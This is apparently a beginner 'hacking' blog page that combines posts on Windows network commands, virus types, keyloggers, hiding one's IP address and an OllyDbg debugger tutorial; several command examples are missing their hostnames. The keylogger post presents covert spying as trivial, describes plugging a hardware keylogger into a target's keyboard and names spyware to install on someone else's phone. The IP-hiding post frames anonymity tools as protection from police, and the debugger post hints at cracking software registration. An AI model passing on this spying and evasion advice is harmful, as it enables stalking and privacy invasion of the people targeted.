Ping is a command used to test the reachability of a host on an Internet Protocol (IP) network and to measure the round-trip time for messages sent from the originating host to a destination computer. Ping is part of ICMP (Internet Control Message Protocol) which is used to troubleshoot TCP/IP networks. So, Ping is basically a command that allows you to check whether the host is alive or not. Ping is also helpful to get ip address of domain name. You can able to see ip address of domain name in [x.x.x.x] .

To ping a particular host the syntax is (at command prompt)--

example:- c:/>ping
Various switches used with 'Ping' command and their usage can be viewed by just typing c:/>ping at the command prompt.

2). Netstat

Netstat is a dos command used to check the current network connection of our system to other displays both incoming and outgoing is also used for finding network problems.
c:/>netstat -n

Telnet is a program which runs on TCP/IP. Using it we can connect to the remote computer on particular port. When connected it grabs the daemon running on that port.
The basic syntax of Telnet is (at command prompt)--


By default telnet connects to port 23 of remote computer.
So, the complete syntax is-

c:/>telnet port

example:- c:/>telnet 21 or c:/>telnet 21
4). Tracert
It is used to trace out the route taken by the certain information i.e. data packets from source to destination. trace route is a computer network diagnostic tool for displaying the route (path) and measuring transit delays of packets across an Internet Protocol (IP) network.

It's syntax is (at command prompt)--


example:- c:/>tracert

Here "*    *    *    Request timed out." indicates that firewall installed on that system block the request and hence we can't obtain it's IP address.

various switches used with tracert command can be viewed by just typing c:/>tracert at the command prompt.
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What is a Computer Virus?

A computer virus is an executable program. Depend on the nature of a virus, it may cause damage of your hard disk contents, and/or interfere normal operation of your computer.
By definition, a virus program is able to replicate itself. This means that the virus multiplies on a computer by making copies of itself. In most cases, if a file that contains virus is executed or copied onto another computer, then that computer will also be "infected" by the same virus.
A virus program contains instructions to initiate some sort of "event" that affects the infected computer. Each virus has an unique event associated with it. These events and their effects can range from harmless to devastating. For examples:
  • An annoying message appearing on the computer screen.
  • Reduced memory or disk space.
  • Modification of data.
  • Files overwritten or damaged.
  • Hard drive erased.
Types of viruses :-
The different types of viruses are as follows-

1) Boot Sector Virus :-
The number one position on a hard drive is the Master Boot Record (MBR). The MBR contains the partition Table—the data specifying the type of hard disk and the partitioning information.The terms “Master Boot Record”, “partition table”, and “partition boot record” are
Often used interchangeably, although they are not exactly the same thing. Some Programs, such as the Boot sector Viruses, always attack the physical first sector: the Master Boot Record on hard disks.

Examples of boot- sector viruses are Michelangelo and Stoned.

2) File or Program Viruses :- 
Some files/programs, when executed, load the virus in the memory and perform predefined functions to infect the system. File-infecting viruses generally (though not exclusively) attach to a file in one of
three ways. Some file viruses prep end, or bind themselves, to the beginning of the file, so that they run first. Other files append, or connect themselves to the end of the file, but modify the beginning of the file so that the virus runs first. Others overwrite some part of the existing file They infect program files with extensions like .EXE, .COM, .BIN, .DRV and .SYS .

Some common file viruses are Sunday, Cascade.

3) Multiplicative Viruses :- 
A multiplicative virus is a computer virus that infects multiple different target platforms, and remains recursively infective in each target. It attempts to attack both the boot sector and the executable, or programs, files at the same time. When the virus attaches to the boot sector, it will in turn affect the system’s files, and when the virus attaches to the files, it will in turn infect the boot sector.
This type of virus can re-infect a system over and over again if all parts of the virus are not eradicated.

Ghost ball was the first multiplicative virus, discovered by Fridrik Skulason in October 1989.
Other examples are Invader, Flip, etc.

4) Stealth Viruses :- 
This term has become so popularly debased as to include virtually any virus that neither asks permission to infect nor announces its presence by a characteristic message, graphic,sound effect, and so on. These viruses are stealthy in nature means it uses various methods for hiding themselves to avoid detection. They sometimes remove themselves from the memory temporarily to avoid detection by antivirus.

5) Macro Viruses

This is a new type of virus that use an application's own macro programming feature to distribute themselves. Unlike other viruses, macro viruses do not infect programs; they infect documents.
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Hacking With Keyloggers

Maximum of us have a knowledge about key loggers.for those who don't know "Keyloggers are nothing but spy software used to spy on someone and know what they are doing". Hacking with keyloggers is very much simple even a 10 years old child can do this.
The word keyloggers was named because these software record keystrokes, anyway these programs extended there features like recording audio,video,taking screen shots and many others.

There are mainly two types of keyloggers.

1). Software Keyloggers
Software keyloggers are the application programs generally written in a Programming language.The advantage of Software Keyloggers are that Maximum of them are free to use.But the main disadvantage of Software keyloggers is that they can be easily detected and removed by anti virus software. Even Sometimes they sends victim's and hacker's Keylogs to their Server.
There are lots of keyloggers available in market but the one which i like is Beyond Keylogger.

2). Hardware keyloggers 
Hardware keyloggers are nothing but hardware devices which are added to peripheral devices of system to to say spy on someone.All we have to do only is to attach keylogger with any of the doesn’t affect the functioning of the device when it got silently records all the There are lots of available hardware keyloggers available in market out of which PS/2 and USB keyloggers are widely used.

Installation of the hardware PS/2 keylogger in record mode is quick and easy. Simply plug it in between the PS/2 keyboard and the PS/2 keyboard port. No software of drivers are required. The hardware keylogger will automatically start recording all data typed on the keyboard to the internal flash disk.

Keylogger for mobiles
Just install a freeware keylogger like BOSSPY or 1MOLE on the iPhone, iPad or Android phone you want to spy. 
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Hide Your IP address

Everyone these days seems to go to google by default when they want to run a search on just about anything. But were you aware that Google logs the IP address of every search done, and stores records of every search ever made from that IP
This post is very much useful for both normal users and hackers.

As a hackers point of view IP address hiding is also very much helpful to stay safe from the cyber cop.
So now i am going to tell you about some good tools and techniques which helps you to do this.

Using Proxy Servers Or Web Proxies
Proxy servers acts as a middle man between your browser(client) and the website(server). Proxy servers take request from client and forward that request to website from their ip address.

There are lots of websites which offers Proxy servers services.Some of them are listed below

Using TOR Browser
Tor is free software and an open network that helps you defend against a form of network surveillance that threatens personal freedom and privacy, confidential business activities
You can download TOR browser from the official website of TOR.
The link to official website is

Using Hotspot shield
Now i am going to tell You the Best way to stay anonymous on internet. tor browsers and proxy servers only hides the communication which occured with the help of browsers.means when we use some application program like gtalk or yahoo messenger, and port scanner e.t.c which use internet to communicate will provide our original ip address to the web server. so we can't say that we are totally safe when we are using tor browser or proxy servers.

Now i am going to tell You about Hotspot shield. Hotspot Shield creates a virtual private network (VPN) between your laptop or iPhone and our Internet gateway. This impenetrable tunnel prevents snoopers, hackers, ISP’s, from viewing your web browsing activities, instant messages, downloads, credit card information or anything else you send over the network. Hotspot Shield security application is free to download, employs the latest VPN technology, and is easy to install and use.

You can follow this link to download hotspot shield.
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Using OllyDBG, Part 1

In this i will introduce you to using OllyDBG. Olly has many functions and the only way to truly learn them all is to experiment and practice. So, lets get started

Loading the app

The first step is to load the intended binary into Olly. You can either drag and drop the file onto Olly’s disassmebly window, or click the load icon on the top far left and choose the file.  Olly will do analysis (if you can read it fast enough in the bottom bar of Olly’s display) and will stop at the programs Entry Point (EP).

The first thing to notice is that the EP is at address 401000, as we can see in the first column. This is a pretty standard starting point for an executable (at least an executable that has not been packed or obfuscated anyway). If your screen looks different and Olly has not stopped at 401000, try going into Appearance and selecting debugging options, click on the “Events” tab, and make sure “WinMain (if location is known)” is checked. Then restart the app).

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Introducing OllyDBG

What is Olly Debugger?

From the author, Oleh Yuschuk, “OllyDbg is a 32-bit assembler level analysing debugger for Microsoft® Windows®. Emphasis on binary code analysis makes it particularly useful in cases where source is unavailable. ” Olly is also a “dynamic” debugger, meaning it allows the user to change quite a few things as the program is running. This is very important when experimenting with a binary, trying to figure out how it works. Olly has many, many great features, and that is why it is probably the number one debugger used for reverse engineering (at least in ring 3, but we’ll get to that later.)

An Overview

Here is a picture of Olly’s main display, along with some labels:
     Main Olly Display
Olly opens with the default window, CPU, open. This is where most of the “big-picture” data is. If you ever close this window, just click the “C” icon in the toolbar. It is separated into 4 main fields; Disassembly, Registers, Stack, and Dump. Here is a description of each section.

1. Dis-assembly

This window contains the main disassembly of the code for the binary. This is where Olly displays information in the binary, including the opcodes and translated assembly language. The first column is the address (in memory) of the instruction. The second column is what’s called the opcodes- in assembly language, every instruction has at least one code associated with it (many have multiple). This is the code that the CPU really wants and the only code it can read. These opcodes make up ‘machine language’, the language of the computer. If you were to view the raw data in a binary (using a hex editor) you would see a string of these opcodes, and nothing more. One of Olly’s main jobs is to ‘disassemble’ this ‘machine language’ into more human readable assembly language. The third column is this assembly language. Granted, to someone who does not know assembly, it doesn’t look much better than the opcodes, but as you learn more, the assembly offers FAR more insight into what the code is doing.

The last column is Olly’s comments on that line of code. Sometimes this contains the names of API calls (if Olly can figure them out) such as CreateWindow and GetDlgItemX. Olly also tries to  help us understand the code by naming any calls that are not part of the API with helpful names, in the case of this picture, “ImageRed.00510C84″ and “ImageRed.00510BF4″. Granted, these are not that helpful, but Olly also allows us to change them into more meaningful names. You may also put your own comments in this column; just double-click on the line in this column and a box pops up allowing you to enter your comment. These comments will then be saved for next time automatically.

2. Registers

Every CPU has in it a collection of registers. These are temporary holders for values, much like a variable in any high-level programming language. Here is a more detailed (and labeled) view of the registers window:
                              Olly Registers Window
On the top is the actual CPU Registers. The registers will change color if they have been changed from black to red (makes it really easy to watch for changes). You can also double click on any of the registers to change their contents. These registers are used for many things, and we will have much to say about them later.
The middle section are flags, used by the CPU to flag the code that something has happened (two numbers are equal, one number is greater than another, etc). Double clicking one of the flags changes it. These will also play an important part in our journey.
The bottom section are the FPU, or Floating Point Unit registers. These are used whenever the CPU performs any arithmetic involving decimal points. These are rarely used by reversers, mostly when we get into encryption.

3. The Stack

                          Olly Stack Window

The stack is a section of memory reserved for the binary as a ‘temporary’ list of data. This data includes pointers to addresses in memory, strings, markers, and most importantly, return addresses for the code to return to when calling a function. When a method in a program calls another method, control needs to be shifted to this new method so that it can retun. The CPU must keep track of where this new method was called from so that when this new method is done, the CPU can return to where it was called and continue executing the code after the call. The stack is where the CPU will hold this return address.

One thing to know about the stack is that it is a a “First In, Last Out” data structure. The metaphor normally used is one of those stacks of plates in a cafeteria that are spring loaded. When you ‘push’ a plate onto the top, all of the plates underneath are pushed down. When you remove (‘pop’) a plate off the top, all of the plates that were underneath raise up one level. We will see this in action in the next tutorial, so don’t worry if it’s a little hazy.

In this picture, the first column is the address of each data member, the second column is the hex, 32-bit representation of the data, and the last column is Olly’s comments about this data item, if it can figure them out. If you notice the first row, you will see a “RETURN to kernel…” comment. This is an address that the CPU has placed on the stack for when the current function is done, so that it will know where to return to.

In Olly, you can right click on the stack and choose ‘modify’ to change the contents.
4 The Dump

           Olly Dump Window 

Earlier in this tutorial, when we talked about the raw ‘opcodes’ that the CPU reads inside a binary, I mentioned that you could see this raw data in a hex viewer. Well, in Olly, you don’t have to. The dump window is a built-in hex viewer that lets you see the raw binary data, only in memory as opposed to on disk. Usually it shows two views of the same data; hexadecimal and ASCII. These are represented in the two right-hand columns in the previous picture (the first column is the address in memory that the data resides.) Olly does allow these representations of data to be changed, and we will see this later in the tutorials.

The Toolbar

Unfortunately, the Olly toolbar leaves a little much to be desired (especially as English is not the author’s first tongue.) I have labeled the left hand toolbar icons to help:

                        Olly toolbar 1 These are your main controls to run code. Keep in mind that, especially as you start using Olly, all of these buttons are also accessible from the “Debug” drop down menu, so if you don’t know what something is, you can look in there.
I will make a couple of remarks about some of the icons. “Re-load” is basically to restart the app and pause it at the entry point. All patches (see later) will be removed, some breakpoints will be disabled, and the app will not have run any code yet, well, most of the time anyway. “Run” and “Pause” do just that. “Step In” means run one line of code and then pause again, calling into a function call if there was one. “Step Over” does the same thing, but jumps over a call to another function. “Animate” is just like Step In and Over except it does it slowly enough that you can watch it. You won’t use this much, but sometimes it’s fun to watch code run, especially if it’s a polymorphic binary and you can watch the code change. But I’m getting ahead of myself…
Next is the (even more cryptic) windows icons:
                  Olly Toolbar 2

Each of these icons opens a window, some of which you will use often, some rarely. Seeing as they are not the most intuitive letters, you can also do like I did and just start clicking them all until you find what you want. Each of these are also accessible in the “View” menu, so you can get some help when first starting out.I will go over some of the more common windows right now:

1. (M)emory

The memory window displays all of the memory blocks that the program has allocated. It includes the main sections of the running app (in this case, the “Showstr ” items in the Owner column. You can also see a lot of other sections down the list; these are DLL’s that the program has loaded into memory and plans on using. If you double-click on any of these lines, a window will open showing a disassembly (or hex dump) of that section. This window also shows the type of block, the access rights, the size and the memory address where the section is loaded.

2. (P)atches


This window displays any “patches” you have made, ie. any changes to the original code. Notice that the state is set as Active; if you re-load the app (by clicking the re-load icon) these patches will become disabled. In order to re-enable them (or disable them) simply click on the desired patch and hit the spacebar. This toggles the patch on/off. Also notice that in the “Old” and “New” columns it shows the original instructions as well as the changed instructions.

3. (B)reakpoints

     Olly Breakpoints

This window shows where all of the current breakpoints are set. This window will be your friend 

3. (K)all Stack

(Gee, I wonder why beginners have a hard time remembering these icons…)
Olly stack

This window is different from the “Stack” see earlier. It shows a lot more info about calls being made in the code, the values sent to those functions, and more. We will see more of this shortly.
* In the next tutorial I will be including my version of Olly with many ‘upgrades’, some of which are buttons that you can actually understand. Here, you can see a picture of it *
Random Olly

The Context Menu

For the last item of this tutorial, I wanted to quickly introduce you to the right-click menu in Olly. It is where a lot of action happens, so you should at least be familiar with it. Right-clicking anywhere in the disassembly section brings it up:
                             Olly menu

I will only go over the most popular items now. As you gain experience, you will end up using some of the less used options. “Binary” allows editing of the binary data on a byte-by-byte level. This is where you may change a “Unregistered” string buried in a binary to “Registered”. “Breakpoint” allows you to set a breakpoint. There are several types of breakpoints and we will be going over them in the next tutorial. “Search For” is a rather large sub-menu, and it’s where you search the binary for data such as strings, function calls etc. “Analysis” forces Olly to re-analyze the section of code you are currently viewing. Sometimes Olly gets confused as to whether you are viewing code or data (remember, they’re both just numbers) so this forces Olly to consider where you are in the code and attempt to guess what this section should look like.
Also notice that my menu will look different from yours in that I have some plugins installed and they add some functionality. Don’t worry, we will be going over all of these in future tuts.
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